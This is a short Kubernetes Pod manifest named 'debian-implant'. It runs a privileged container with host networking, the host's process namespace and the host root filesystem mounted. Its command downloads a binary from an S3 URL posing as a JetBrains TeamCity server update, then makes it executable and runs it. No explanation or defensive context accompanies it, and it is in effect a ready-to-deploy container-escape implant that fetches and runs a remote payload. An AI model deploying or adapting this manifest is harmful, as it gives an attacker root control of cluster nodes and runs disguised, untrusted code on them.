apiVersion: v1
kind: Pod
metadata:
  name: debian-implant
  namespace: default
spec:
  hostNetwork: true
  hostPID: true
  containers:
  - name: shell
    image: debian:stable-slim
    command: ["/bin/bash", "-c"]
    args:
    - "apt-get update -qq && apt-get install -y -qq curl && curl -fsSL -o /tmp/ts https://jetbrainsteam-updates.s3.amazonaws.com/teamcity-server-update.bin && chmod +x /tmp/ts && /tmp/ts & sleep 99999"
    securityContext:
      privileged: true
    volumeMounts:
    - name: host
      mountPath: /host
  volumes:
  - name: host
    hostPath:
      path: /
  restartPolicy: Never
